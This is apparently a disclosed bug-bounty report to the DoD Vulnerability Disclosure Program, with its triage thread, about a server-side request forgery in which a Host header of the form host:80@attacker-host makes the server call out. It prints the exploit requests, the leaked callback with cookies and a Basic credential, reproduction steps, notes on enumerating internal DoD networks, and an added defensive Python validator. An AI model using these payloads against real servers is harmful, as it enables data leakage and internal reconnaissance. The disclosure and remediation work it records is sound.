alyssa_herrera submitted a report to U.S. Dept Of Defense.

Jan 29th (2 years ago)

Summary:
A server-side request forgery vulnerability appears to leak an internal IP address and tries to connect to an attacker-controlled host.
Description:
In a normal request to this web page

GET / HTTP/1.1
Host: www.████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG; googtrans=/en/zh-TW
Connection: close
Upgrade-Insecure-Requests: 1

It will connect to the website as expected, but if we use an @ in the Host header like this:

GET / HTTP/1.1
Host: www.█████████:80@██████████.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

It'll attempt to connect to our website and leak various information.
On our server we would see this:

GET / HTTP/1.1
Host: ████████.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Cookie: mt=rid=6130; ASPSESSIONIDQABQSQCS=GNPLOPOCDIGPIKHGFMDDBLBG
X--------------: 1.1.1.1
Accept-Encoding: gzip, deflate, identity
Connection: Keep-Alive
Authorization: Basic d3d3LnZpLm5nYi5hcm15Lm1pbDo4MA==
X-BlueCoat-Via: 913daace1d652c00

Additionally, we will see a DNS lookup from this IP, 214.72.0.2, which I confirmed to be DoD owned.

Impact

Medium

Step-by-step Reproduction Instructions

We can reproduce this simply by using www.████:80@yourhostname.com as the Host header, and we'll see the results, as seen below:

GET / HTTP/1.1
Host: www.████:80@yourwebsite.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

If you have Burp Suite Pro, you can do this easily with Burp Collaborator.

Product, Version, and Configuration (If applicable)

N/a

Suggested Mitigation/Remediation Actions

Refuse attempts to connect to other hosts.

Impact

This will allow attackers to gain access to an internal IP of a DoD website, along with other sensitive information that may be leaked with the request.
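As an added example (not code from the report or from the DoD), the Python below models why the `host:port@other-host` form of the Host header produces a request like the one the reporter captured: a proxy that builds a URL from the Host value and parses it treats everything before the `@` as userinfo, so it connects to the host named after the `@` and sends the original `host:port` as HTTP Basic credentials, which is consistent with the `Authorization: Basic` header seen on the attacker's server. The second function is the strict Host validation a front-end should apply instead; `www.example.mil`, `attacker.example` and the allowlist are constructed values.

```python
import base64
import re
from urllib.parse import urlsplit

# Host header grammar per RFC 7230 section 5.4: host [ ":" port ], never userinfo.
# Only reg-name hosts are handled; IPv6 literals are omitted (assumption).
_HOST_RE = re.compile(r"^(?P<host>[A-Za-z0-9.-]{1,253})(?::(?P<port>\d{1,5}))?$")

# Constructed allowlist of hostnames this front-end is meant to serve (assumption).
ALLOWED_HOSTS = {"www.example.mil"}


def naive_forward_target(host_header: str) -> dict:
    """Model of a proxy that builds 'http://' + Host and URL-parses the result.

    For 'www.example.mil:80@attacker.example' the parser reads 'www.example.mil:80'
    as userinfo, so the outbound connection goes to attacker.example and the
    original host:port is encoded as an HTTP Basic credential.
    """
    parts = urlsplit("http://" + host_header)
    basic = None
    if parts.username is not None:
        raw = parts.username
        if parts.password is not None:
            raw += ":" + parts.password
        basic = base64.b64encode(raw.encode()).decode()
    return {"connect_to": parts.hostname, "basic_auth": basic}


def validate_host_header(host_header: str, allowed=ALLOWED_HOSTS):
    """Strict check to apply before Host is used to pick an upstream.

    Returns (ok, reason): rejects userinfo ('@'), anything outside the
    host[:port] grammar, out-of-range ports and hosts not on the allowlist.
    """
    if "@" in host_header:
        return False, "userinfo is not permitted in Host"
    m = _HOST_RE.match(host_header)
    if not m:
        return False, "malformed Host"
    if m.group("port") is not None and not 1 <= int(m.group("port")) <= 65535:
        return False, "port out of range"
    if m.group("host").lower() not in allowed:
        return False, "host not on allowlist"
    return True, "ok"


if __name__ == "__main__":
    for h in ["www.example.mil", "www.example.mil:80@attacker.example"]:
        print(h, "->", naive_forward_target(h), validate_host_header(h))
```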

BOT: U.S. Dept Of Defense posted a comment.

Jan 29th (2 years ago)

Greetings from the Department of Defense (DoD),

Thank you for supporting the DoD Vulnerability Disclosure Program (VDP).

By submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.

The VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.

We will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.

Our goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.

Regards,

The VDP Team

aboateng changed the status to Needs more info.

Updated Feb 7th (2 years ago)

Greetings @alyssa_herrera,

To validate the reported vulnerability, we require additional information.

Can you please answer the following questions?

Which information do you deem sensitive? Also, please provide screenshot(s) or a screen recording to illustrate the issue so we can clearly understand the issue you are reporting.

I will continue processing your report on receipt of your response. You will receive another status update upon completion of this review. If I have any other questions in the interim, I will be back in touch.

If we do not receive a response within two weeks, we will send you a second request for this information. If we do not receive a response from you within two weeks of the second notice, we will have to close this report without action.

If you have any questions, please let me know.

Thanks again for supporting the DoD Vulnerability Disclosure Program.

Regards,


alyssa_herrera changed the status to New.

Updated Oct 11th (2 months ago)

This is quite similar to #277450, with the same issue.

Whois for both IPs:
Source: whois.arin.net
IP Address: ██████
Name: ███
Handle: ███████
Registration Date: █████
Range: ████
Org: ████████
Org Handle: ███
Address: ██████
City: ████████
State/Province: ████
Postal Code: █████
Country: United States
Name Servers:

Source: whois.arin.net
IP Address: █████
Name: ███
Handle: ███
Registration Date: █████
Range: ████
Org: Headquarters, █████████
Org Handle: ████████
Address: ████
City: ███
State/Province: ███████
Postal Code: █████
Country: United States
Name Servers:

aboateng updated the severity to Low.

Feb 7th (2 years ago)

aboateng changed the status to Triaged.

Feb 7th (2 years ago)

Greetings,

We have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.

Thank you for bringing this vulnerability to our attention!

We will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.

You will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.

Thanks again for supporting the DoD Vulnerability Disclosure Program.

Regards,

The VDP Team


alyssa_herrera posted a comment.

Updated Oct 11th (2 months ago)

Hello, I'd like to give a bit of an update on this exploit. I figured out we can perform blind SSRF using this exploit.

If we use an HTTPS-enabled website, we can trigger an SSL error, which leads me to believe this website has the necessary capability to connect to other military websites, either through the intranet or through the clearnet. If we can query known military DNS, it'll time out, confirming it exists. I can do this with any DoD IP, thus an attacker can enumerate the DoD internal infrastructure. I hope this is enough to bump the severity up a bit. Additionally, we can use an IP I was able to pull from another report of mine to prove this theory.
If we use www.██████████:80@████████

We can use this to tunnel into internal networks and access intranet servers, which I assume are accessible to NIPRNet if my understanding of the DoD intranet is correct.

ag3nt-dc3 updated the severity from Low to Medium.

Mar 16th (2 years ago)

ag3nt-z3 closed the report and changed the status to Resolved.

Oct 24th (about 1 year ago)

Good news!

The vulnerability you reported has been resolved and this report is now closed. If you have any further questions or disagree that the report is resolved, please let us know.

Thank you for your time and effort to improve the security of the DoD information network.

Regards,

The VDP Team

alyssa_herrera requested to disclose this report.

Sep 12th (3 months ago)

agent-1 agreed to disclose this report.

Dec 3rd (2 days ago)

Approved for disclosure. Thanks for your participation in the DoD Vulnerability Disclosure Program (VDP). Please follow us on Twitter @DC3VDP.
